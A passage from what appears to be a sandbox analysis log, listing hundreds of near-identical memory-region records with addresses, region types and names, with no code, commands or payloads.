"pagefile_0x0000000000610000" filename = "" Region: id = 10787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10791 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10792 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10796 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10797 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10798 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10799 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10800 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10801 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10802 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10803 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10804 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10805 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10806 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10807 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10808 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10809 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10810 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10811 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10812 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10813 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10814 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10815 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10816 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10817 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10827 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10831 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10832 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10841 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10842 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10843 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10844 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10845 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10853 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10859 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10864 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10877 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10878 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10880 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10881 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10882 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10892 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10893 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10896 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10897 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10900 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10901 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10902 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10903 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10904 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10905 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10906 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10907 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10908 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10909 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10910 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10911 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10912 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10916 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10917 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10918 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10919 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10920 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10921 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10922 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10923 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10924 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10925 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10926 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10927 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10928 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10929 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10930 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10931 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10932 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10933 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10934 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10935 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10936 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10937 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10938 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10941 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10942 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10946 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10950 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10959 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10960 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10961 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10962 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10963 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10972 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 